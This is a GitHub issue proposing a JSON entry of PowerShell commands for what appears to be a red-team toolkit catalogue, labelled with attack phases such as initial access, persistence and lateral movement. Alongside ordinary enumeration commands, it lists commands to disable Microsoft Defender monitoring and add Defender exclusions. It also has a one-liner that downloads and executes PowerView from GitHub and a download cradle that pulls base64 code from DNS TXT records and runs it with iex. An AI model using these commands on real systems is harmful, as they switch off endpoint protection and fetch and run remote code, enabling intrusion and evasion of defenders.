
New tool: PowerShell #100

Closed Patrick-DE closed 1 year ago

Patrick-DE commented 1 year ago
{
  "name": "PowerShell",
  "phases": [
    "01. Initial Access",
    "03. Host Enumeration",
    "04. Persistence",
    "05. Privilege Escalation",
    "07. Lateral Movement"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Windows"
  ],
  "source": "https://learn.microsoft.com/de-de/powershell/?view=powershell-7.3",
  "description": "PowerShell",
  "undetected": [],
  "detected": [],
  "content": "\n\n## [[LSA Protection]]\n`Get-WinEvent -FilterHashtable @{ LogName='system'; Id='12' ; ProviderName='Microsoft-Windows-Wininit' }`\n\n## [[RDP]]\n`Get-WinEvent -FilterHashtable @{ LogName='Microsoft-Windows-TerminalServices-RDPClient/Operational'; id='1024' } | select timecreated, message | ft -AutoSize -Wrap`\n\n## [[COM Hijacking]]\nList COM objects\n`gwmi Win32_COMSetting | ? {$_.progid } | sort | ft ProgId,Caption,InprocServer32`\n\nList COM Object Methods for WScript.Shell.1\n`$o = [activator]::CreateInstance([type]::GetTypeFromProgID((\"WScript.Shell.1\"))) | gm`\n\n## [[Unquoted Service Path]]\nGet ACLs of services\n```ps\npowershell Get-Acl -Path \"C:\\Program Files\\Vuln Services\" | fl\n  \nPath   : Microsoft.PowerShell.Core\\FileSystem::C:\\Program Files\\Vuln Services\nOwner  : BUILTIN\\Administrators\nGroup  : wkstn1\\None\nAccess : CREATOR OWNER Allow  FullControl\n NT AUTHORITY\\SYSTEM Allow  FullControl\n BUILTIN\\Administrators Allow  FullControl\n BUILTIN\\Users Allow  Write, ReadAndExecute, Synchronize\n NT SERVICE\\TrustedInstaller Allow  FullControl\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES Allow  ReadAndExecute, Synchronize\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES Allow  ReadAndExecute, Synchronize\n```\n\n## [[Common Language Runtime (CLR) Versions]]\n```ps\ndir %WINDIR%\\Microsoft.Net\\Framework\\ /s /b | find \"System.dll\"\n\n[System.IO.File]::Exists(\"$env:windir\\Microsoft.Net\\Framework\\v2.0.50727\\System.dll\")\n\n[System.IO.File]::Exists(\"$env:windir\\Microsoft.Net\\Framework\\v4.0.30319 System.dll\")\n```\n\n",
  "commands": [
    {
      "id": "6183749c-eee5-42ca-a171-ac1b1a35a449",
      "name": "Check LSA Protection",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Get-WinEvent -FilterHashtable @{ LogName='system'; Id='12' ; ProviderName='Microsoft-Windows-Wininit' }"
    },
    {
      "id": "a7a1f9d8-ead2-4ef3-a773-1bda67790647",
      "name": "Decode Base64",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($str))"
    },
    {
      "id": "a8516fd7-ce4f-4c19-97c9-780aa299f594",
      "name": "Disable Defender",
      "description": "",
      "tag": "",
      "results": [],
      "references": ["https://github.com/evilmog/evilmog/wiki/DNS-Download-Cradle"],
      "cmd": "Set-MpPreference -DisableRealtimeMonitoring $true\nSet-MpPreference -DisableBehaviorMonitoring $true\nSet-MpPreference -DisableScriptScanning $true\nSet-MpPreference -DisableArchiveScanning $true",
      "requirements": {
        "tag": "PRIVS:ADMIN"
      }
    },
    {
      "id": "d246dc40-5194-4f1e-a4ca-208827e49e36",
      "name": "Encode Base64",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))"
    },
    {
      "id": "48b78655-db1f-4da0-9d31-f90cc810eb3e",
      "name": "Get ACLs of services",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "powershell Get-Acl -Path \"C:\\Program Files\\Vuln Services\" | fl"
    },
    {
      "id": "bf3b2a29-c697-4835-aadd-02cf9a14dcbc",
      "name": "Get all COM objects via wmi",
      "description": "Produces a lot of output",
      "tag": "",
      "results": [],
      "cmd": "gwmi Win32_COMSetting | ? {$_.progid } | sort | ft ProgId,Caption,InprocServer32"
    },
    {
      "id": "5c9766c7-293d-4110-bfeb-0aabfd061080",
      "name": "Get CLR versions",
      "description": "Get Common Language Runtime (CLR) versions",
      "tag": "",
      "results": [],
      "cmd": "cmd.exe /c dir %WINDIR%\\Microsoft.Net\\Framework\\ /s /b | find \"System.dll\"\n\n[System.IO.File]::Exists(\"$env:windir\\Microsoft.Net\\Framework\\v2.0.50727\\System.dll\")\n[System.IO.File]::Exists(\"$env:windir\\Microsoft.Net\\Framework\\v4.0.30319 System.dll\")"
    },
    {
      "id": "52121667-91db-4042-910a-ae02121b82f3",
      "name": "Get Defender Detections",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Get-MpThreatDetection"
    },
    {
      "id": "c6a72c8f-0734-4a95-9dfd-241ac41591b5",
      "name": "Get Defender Exclusions",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Get-MpPreference | Select-Object -ExpandProperty ExclusionPath",
      "requirements": {
        "tag": "PRIVS:ADMIN"
      }
    },
    {
      "id": "4e5c3ef8-0775-4d8e-af57-a82dc066e524",
      "name": "Get Defender Status",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Get-MpComputerStatus\nGet-MpPreference"
    },
    {
      "id": "3c5b88d5-05d2-43bd-912a-d7025e4751f0",
      "name": "Get Imported Modules",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Get-Module -All"
    },
    {
      "id": "94a5526d-cdc0-47e9-afd7-a14881beffe1",
      "name": "Get latest MDE Detection",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Get-MpThreatDetection |sort $_.InitialDetectionTime |select -First 1"
    },
    {
      "id": "e6685b82-4fa3-4591-bc80-732a64a8cc28",
      "name": "Get methods of COM object ",
      "description": "List COM Object Methods for WScript.Shell.1",
      "tag": "",
      "results": [],
      "cmd": "[activator]::CreateInstance([type]::GetTypeFromProgID((\"WScript.Shell.1\"))) | gm"
    },
    {
      "id": "36c7d31c-865d-4e71-83fe-cd41b3560f42",
      "name": "Get MSSQL Servers",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "ADForestInfoRootDomain = ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).RootDomain\n$ADForestInfoRootDomainDN = \"DC=\" + $ADForestInfoRootDomain -Replace(\"\\.\",',DC=')\n$ADDomainInfoLGCDN = 'GC://' + $ADForestInfoRootDomainDN\n$root = [ADSI]$ADDomainInfoLGCDN\n$ADSPNSearcher = new-Object System.DirectoryServices.DirectorySearcher($root,\"(serviceprincipalname=*sql*)\")\n$ADSPNSearcher.PageSize = 500\n$AllADSQLServerSPNs = $ADSPNSearcher.FindAll()"
    },
    {
      "id": "cc43d2fa-b951-4f09-b37f-91f34ea5bbaf",
      "name": "Get RDP Events",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Get-WinEvent -FilterHashtable @{ LogName='Microsoft-Windows-TerminalServices-RDPClient/Operational'; id='1024' } | select timecreated, message | ft -AutoSize -Wrap"
    },
    {
      "id": "cfdc1559-6498-40c2-8bbe-e200e7a47ec1",
      "name": "Get Registry Entry",
      "description": "Using AppLocker and WDAC as examples",
      "tag": "",
      "results": [],
      "cmd": "#APPLOCKER\nGet-ChildItem -Path 'HKLM:\\Software\\Policies\\Microsoft\\Windows\\SRPV2'\nGet-ChildItem -Path 'HKLM:\\System\\CurrentControlSet\\Control\\SRP\\GP'\nGet-ChildItem -Path \n#WDAC\n'HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\DeviceGuard -v DeployConfigCIPolicy'\nGet-ChildItem -Path 'HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\DeviceGuard -v ConfigCIPolicyFilePath'"
    },
    {
      "id": "7dc8490f-8454-4d39-83d5-43bcda1bc27c",
      "name": "Launch C# via PowerShell",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "$id = get-random\n$assemblies = (\"System.Core\",\"System.Xml.Linq\",\"System.Data\",\"System.Xml\", \"System.Data.DataSetExtensions\", \"Microsoft.CSharp\")\nAdd-Type -ReferencedAssemblies $assemblies -TypeDefinition $code -Language CSharp\n$code = @\"\nusing System;\nnamespace HelloWorld\n{\n\tpublic class Program$id\n\t{\n\t\tpublic static void Main(){\n\t\t\tConsole.WriteLine(\"Hello world!\");\n\t\t}\n\t}\n}\n\"@\n \nAdd-Type -TypeDefinition $code -Language CSharp\t\niex \"[HelloWorld.Program$id]::Main()\""
    },
    {
      "id": "7e1ff5f3-6e68-405c-81b5-64bba180e491",
      "name": "Load Github Script Remotely",
      "description": "Shown with an example of PowerView",
      "tag": "",
      "results": [],
      "cmd": "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Find-GPOLocation -UserName Administrator;"
    },
    {
      "id": "91dc7ca7-51e5-414f-a6c7-37094cfa60e5",
      "name": "PS-Remoting",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Invoke-Command -ComputerName Test1-Win2k16 -ScriptBlock{Get-LocalGroupMember -Name 'Administrators'}",
      "requirements": {
        "tag": "SERVICE:WINRM"
      }
    },
    {
      "id": "eb9dc6fa-f509-41ab-ab5c-33653b431bc4",
      "name": "Set Defender Exclusions",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Set-MpPreference -ExclusionPath PATH\\TO\\FOLDER\nSet-MpPreference -ExclusionExtension docx\nSet-MpPreference -ExclusionProcess Process",
      "requirements": {
        "tag": "PRIVS:ADMIN"
      }
    },
    {
      "id": "0b63dd81-e89a-4934-b625-4ab767e81149",
      "name": "Trigger WSUS",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "$updateSession = New-Object -com \"Microsoft.Update.Session\"; $updates=$updateSession.CreateupdateSearcher().Search($criteria).Updates; wuauclt.exe /reportnow"
    },
    {
      "id": "3949f2c6-7e9a-4b65-91c4-657ef1766dce",
      "name": "Download cradle via TXT DNS records",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "$a='';$n=1..2;ForEach ($i in $n) { $a += ((resolve-dnsname -type txt $mydomain.org).strings) }; iex((System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a))))"
    }
  ]
}